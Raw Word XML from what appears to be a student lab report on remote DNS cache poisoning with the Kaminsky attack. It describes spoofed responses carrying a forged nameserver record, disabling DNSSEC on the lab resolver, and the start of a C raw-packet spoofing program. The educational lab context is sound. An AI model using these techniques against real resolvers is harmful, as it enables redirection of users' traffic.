          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006E5065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">” command from the user’s machine, and the returned address must be fake IP address. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED476A8" w14:textId="77777777" w:rsidR="006E5065" w:rsidRDefault="006E5065" w:rsidP="008A21E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151B2F92" w14:textId="77777777" w:rsidR="0047117F" w:rsidRDefault="0047117F" w:rsidP="0047117F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4238B8ED" w14:textId="77777777" w:rsidR="0047117F" w:rsidRDefault="0047117F" w:rsidP="0047117F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0047117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.1 Task 1: Remote Cache Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FC261" w14:textId="77777777" w:rsidR="005150D6" w:rsidRPr="0047117F" w:rsidRDefault="005150D6" w:rsidP="0047117F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC4B409" w14:textId="45F09F65" w:rsidR="0047117F" w:rsidRDefault="005150D6" w:rsidP="008A21E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F1A7F8E" wp14:editId="0A6B0021">
            <wp:extent cx="5937250" cy="4262755"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="2" name="Picture 2" descr="../../../Downloads/Screenshots/Screen%20Shot%202018-03-20%20at%207.12.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creenshots/Screen%20Shot%202018-03-20%20at%207.12.08%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4262755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C70D12A" w14:textId="77777777" w:rsidR="005150D6" w:rsidRPr="008A21E2" w:rsidRDefault="005150D6" w:rsidP="008A21E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D8A1293" w14:textId="209A5A33" w:rsidR="00673AA0" w:rsidRPr="00673AA0" w:rsidRDefault="00673AA0" w:rsidP="00673AA0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57630C41" w14:textId="67CAD9F2" w:rsidR="00673AA0" w:rsidRDefault="002F6005">
      <w:r>
        <w:t xml:space="preserve">The original DNS query process is shown in the figure above. </w:t>
      </w:r>
      <w:r w:rsidR="00CF01D6">
        <w:t xml:space="preserve">The attacker sends a DNS request to the Apollo </w:t>
      </w:r>
      <w:r w:rsidR="007D5AC5">
        <w:t>Server (</w:t>
      </w:r>
      <w:r w:rsidR="00CF01D6">
        <w:t xml:space="preserve">1), </w:t>
      </w:r>
      <w:r w:rsidR="00424D39">
        <w:t xml:space="preserve">The query will go through </w:t>
      </w:r>
      <w:r w:rsidR="001C54CB">
        <w:t xml:space="preserve">one of the Root DNS servers, </w:t>
      </w:r>
      <w:r w:rsidR="00BA09EA">
        <w:t xml:space="preserve">the .COM DNS Server, </w:t>
      </w:r>
      <w:r w:rsidR="007830CC">
        <w:t xml:space="preserve">and the final result will come from </w:t>
      </w:r>
      <w:r w:rsidR="00FF6FF8">
        <w:t>example.com’s DNS server.</w:t>
      </w:r>
      <w:r w:rsidR="009F6F74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D107D">
        <w:t xml:space="preserve">In case the </w:t>
      </w:r>
      <w:r w:rsidR="009236CF">
        <w:t>name server’s</w:t>
      </w:r>
      <w:r w:rsidR="009236CF">
        <w:br/>
        <w:t xml:space="preserve">information is already cached by Apollo, </w:t>
      </w:r>
      <w:r w:rsidR="00F32B2D">
        <w:t xml:space="preserve">the query will not go through </w:t>
      </w:r>
      <w:r w:rsidR="00F8655E">
        <w:t xml:space="preserve">the root or .COM server, </w:t>
      </w:r>
      <w:r w:rsidR="00F07B02">
        <w:t>So the query process will directly go to DNS server of example.com which is more common as shown in the image below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB13E4D" w14:textId="26AFD3DC" w:rsidR="0047149E" w:rsidRDefault="00FB0E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="457058A9" wp14:editId="0FB9E62B">
            <wp:extent cx="5937250" cy="4276090"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="../../../Downloads/Screenshots/Screen%20Shot%202018-03-20%20at%209.22.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s/Screen%20Shot%202018-03-20%20at%209.22.36%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250" cy="4276090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F6821" w14:textId="77777777" w:rsidR="0047149E" w:rsidRDefault="0047149E"/>
    <w:p w14:paraId="3C4196FB" w14:textId="77777777" w:rsidR="0047149E" w:rsidRDefault="0047149E"/>
    <w:p w14:paraId="5B75C259" w14:textId="63B11B6F" w:rsidR="00F03235" w:rsidRDefault="00F03235">
      <w:r>
        <w:t xml:space="preserve">While the Apollo waits for </w:t>
      </w:r>
      <w:r w:rsidR="00845960">
        <w:t>DNS reply from the example.com’s name server</w:t>
      </w:r>
      <w:r w:rsidR="003F6E7F">
        <w:t xml:space="preserve">, the attacker can send forged replies to Apollo, pretending </w:t>
      </w:r>
      <w:r w:rsidR="002C7EFC">
        <w:t xml:space="preserve">that replies are from example.com’s name server. If the replies arrive first, it will be accepted by Apollo. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66774BC2" w14:textId="77777777" w:rsidR="00C37D69" w:rsidRDefault="00C37D69"/>
    <w:p w14:paraId="09A246BE" w14:textId="2037B791" w:rsidR="00C37D69" w:rsidRDefault="00C37D69">
      <w:r>
        <w:t xml:space="preserve">The main difficulty in the remote DNS attack lab is the transaction ID. Since we assume that attacker is not on the same VM as DNS server, </w:t>
      </w:r>
      <w:r w:rsidR="00CB07DA">
        <w:t>it has to try all the possible transaction ID</w:t>
      </w:r>
      <w:r w:rsidR="003504C4">
        <w:t xml:space="preserve">s from 0 to 65536(16 bit). </w:t>
      </w:r>
      <w:r w:rsidR="00815907">
        <w:t xml:space="preserve">In reality, if the real packet arrives before, it will be cached and the attack won’t be successful. </w:t>
      </w:r>
      <w:r w:rsidR="007D086B">
        <w:t>To forge another request, the attacker has to wait for cache to timeout, which can be hours or days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222FD629" w14:textId="77777777" w:rsidR="007D086B" w:rsidRDefault="007D086B"/>
    <w:p w14:paraId="25057278" w14:textId="26C69D43" w:rsidR="001826EA" w:rsidRDefault="001826EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001826EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>The Kaminsky Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28858EDE" w14:textId="010073C4" w:rsidR="001826EA" w:rsidRDefault="00BA5E8E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">With the Kaminsky attack, </w:t>
      </w:r>
      <w:r w:rsidR="00265335">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>attacker will be able to continuously attack a DNS server on a domain name, without need for waiting, so attacks can succeed within very short period of time.</w:t>
      </w:r>
      <w:r w:rsidR="00A46B5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> The following </w:t>
      </w:r>
      <w:r w:rsidR="00EE2FD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>are the steps which outline the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE16585" w14:textId="77777777" w:rsidR="00EE2FD2" w:rsidRDefault="00EE2FD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09846B96" w14:textId="77777777" w:rsidR="00583FF2" w:rsidRDefault="00583FF2" w:rsidP="00583FF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1. The attacker queries the DNS Server Apollo for a non-existing name in example.com, such as twysw.example.com, where twysw is a random name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E05ABDB" w14:textId="77777777" w:rsidR="00A82D2F" w:rsidRPr="00A82D2F" w:rsidRDefault="00A82D2F" w:rsidP="00A82D2F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82D2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2. Since the mapping is unavailable in Apollo’s DNS cache, Apollo sends a DNS query to the name server of the example.com domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F55827" w14:textId="1DC0975F" w:rsidR="000D5972" w:rsidRDefault="000D5972" w:rsidP="000D5972">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3. While Apollo waits for the reply, the attacker floods Apollo with a stream of spoofed DNS response [6], each trying a different transaction ID, hoping one is correct. In the response, not only does the attacker provide an IP resolution for twysw.example.com, the attacker also provides an “Authoritative Nameservers” record, indicating ns.dnslabattacker.net as the name server for the example.com domain. If the spoofed response beats the actual responses and the transaction ID matches with that in the query, Apollo will accept and c</w:t>
      </w:r>
      <w:r w:rsidR="000E031F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ache the spoofed answer, </w:t>
      </w:r>
      <w:r w:rsidR="006811E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="006811E1" w:rsidRPr="000D5972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>thus</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apollo’s DNS cache is poisoned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C77DC" w14:textId="77777777" w:rsidR="006811E1" w:rsidRDefault="006811E1" w:rsidP="000D5972">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FD9427" w14:textId="77777777" w:rsidR="00FB7BF2" w:rsidRDefault="006811E1" w:rsidP="006811E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006811E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4. Even if the spoofed DNS response fails (e.g. the transaction ID does not match or it comes too late), it does not matter, because the next time, the attacker will query a different name, so Apollo has to send out another query, giving the attack another chance to do the spoofing attack. This effectively defeats the caching effect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C9661A" w14:textId="77777777" w:rsidR="00FB7BF2" w:rsidRDefault="00FB7BF2" w:rsidP="006811E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06704269" w14:textId="5F02D1D3" w:rsidR="00C37B81" w:rsidRPr="00FB7BF2" w:rsidRDefault="00C37B81" w:rsidP="006811E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7BF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ATTACK CONFIGURATION</w:t>
      </w:r>
      <w:r w:rsidR="00997DC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Apollo DNS server</w:t>
      </w:r>
      <w:r w:rsidR="006C6F2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006C6F2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00997DC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63C782D8" wp14:editId="1293F143">
            <wp:extent cx="5943600" cy="371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_SEED-UBUNTU_21_03_2018_14_27_29.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88B1885" w14:textId="77777777" w:rsidR="00C37B81" w:rsidRDefault="00C37B81" w:rsidP="006811E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509B5E39" w14:textId="601CB95C" w:rsidR="00997DC4" w:rsidRDefault="00997DC4" w:rsidP="00997DC4">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For the simplicity of the lab, the source port on DNS server is fixed to 33333. For all the DNS queries, otherwise the attacker should also try with random destination port to Apollo to make the attack successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDC2FA5" w14:textId="7E7B65F1" w:rsidR="00997DC4" w:rsidRDefault="00997DC4" w:rsidP="00997DC4">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DNS server adopt a protection scheme called DNSSEC to prevent cache poisoning. Hence we disable this with the command: “dnssec-enable no”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A386E7D" w14:textId="343B7184" w:rsidR="00997DC4" w:rsidRDefault="00997DC4" w:rsidP="00997DC4">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Configure the attacker machine with the nameserver of DNS Apollo machine (i.e., 10.0.2.7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677EA067" w14:textId="77777777" w:rsidR="00997DC4" w:rsidRDefault="00997DC4" w:rsidP="00997DC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308F16CB" w14:textId="77777777" w:rsidR="00496555" w:rsidRDefault="00496555" w:rsidP="00997DC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6A3C9D" w14:textId="77777777" w:rsidR="00496555" w:rsidRPr="00997DC4" w:rsidRDefault="00496555" w:rsidP="00997DC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE80D83" w14:textId="79B70F8B" w:rsidR="00EB26D3" w:rsidRDefault="00997DC4" w:rsidP="006811E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B3EA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The udp.c program is pasted below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A44F32" w14:textId="77777777" w:rsidR="00496555" w:rsidRDefault="00496555" w:rsidP="006811E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFC0ED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----udp.c------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D239E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This sample program must be run by root lol! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A05219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61E7B98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The program is to spoofing tons of different queries to the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C4ADE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Use wireshark to study the packets. However, it is not enough for </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414F820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the lab, please finish the response packet and complete the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C38F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7B61F6D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Compile command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7847FFF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gcc -lpcap udp.c -o udp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D33301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2FC8FDA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4CB8EAE1" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D179E7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#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2633B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#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A99AA4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#include &lt;sys/socket.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54270AC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#include &lt;netinet/ip.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D4BCE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#include &lt;netinet/udp.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14607AA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#include &lt;fcntl.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E5F7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#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB1294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#include &lt;errno.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708A5D5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#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072BC1C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#include &lt;libnet.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B69E3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The packet length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE0FF3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#define PCKT_LEN 8192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EABF39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#define FLAG_R 0x8400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ADB9E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#define FLAG_Q 0x0100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C2CEE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50876B6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Can create separate header file (.h) for all headers' structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763003D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The IP header's structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B103C8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struct ipheader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EDDBD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char iph_ihl:4, iph_ver:4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4817525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char iph_tos;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BEDD4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iph_len;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523AAD9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iph_ident;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021CBA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unsigned char      iph_flag;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D903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iph_offset;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1843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char iph_ttl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0698FDD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char iph_protocol;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364F7AE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iph_chksum;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222B8AB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int iph_sourceip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74BC2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int iph_destip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48624CA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7E23768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UDP header's structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3186633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struct udpheader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9A31D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udph_srcport;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3576E9A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udph_destport;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEEC91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udph_len;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA5693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udph_chksum;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C3735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552BFE0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struct dnsheader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD72A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query_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4C3F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flags;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143EBD4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QDCOUNT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EF87B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ANCOUNT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113618D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NSCOUNT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636329F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ARCOUNT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E0EB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4396A951" w14:textId="423CF64F"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This structure just for </w:t>
      </w:r>
      <w:r w:rsidR="00791B43" w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>convenience</w:t>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the DNS packet, because such 4 byte data often appears. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EA5C9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struct dataEnd {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEE263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type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3C789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class;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EA778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14F7F42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total udp header length: 8 bytes (=64 bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075F0112" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B8D52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This is the structure which holds the answer related information after the url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D5E2D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in the data part after udp header. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136BB88F" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2693FBC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unsigned int checksum(uint16_t *usBuff, int isize)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162DB84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7302AF1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int cksum=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4902F90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for(;isize&gt;1;isize-=2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1217E03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cksum+=*usBuff++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3900E4E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7259A29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if(isize==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BE872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cksum+=*(uint16_t *)usBuff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54451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0EEADC9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return (cksum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631E76D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22C1B6A0" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
